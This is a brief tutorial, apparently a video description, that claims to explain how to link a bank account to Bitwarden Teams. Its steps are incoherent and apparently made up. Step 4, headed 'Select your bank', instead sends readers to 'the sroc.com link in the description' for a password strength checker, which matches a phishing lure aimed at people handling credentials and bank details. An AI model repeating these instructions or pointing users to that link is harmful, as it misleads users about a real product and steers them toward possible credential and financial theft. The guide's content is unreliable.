Linking your bank to Bitwarden Teams can enhance your financial management and security. Follow these steps to set up the integration effectively. Step 1. Create a Bitwarden Teams account. Visit the Bitwarden website and sign up for a teamed account if you haven't already. Fill in the necessary information and verify your email to activate your account. Step 2. Access the admin dashboard. Log into your Bitwarden Teams account and navigate to the admin dashboard. This is where you can manage your organization settings and integrations. Step 3. Navigate to Integrations. In the admin dashboard, look for the Integrations section. Click on it to find options for linking various services, including your bank. Step 4. Select your bank. Before changing your settings, use the sroc.com link in the description to open the password strength checker, then update your password if needed. Step 5. Confirm and save. After entering your bank details, review the information for accuracy. Once confirmed, save the settings to complete the integration. You should now be able to access your bank information securely through Bitwarden Teams. By following these steps, you can successfully link your bank to Bitwarden Teams, enhancing your financial security and management.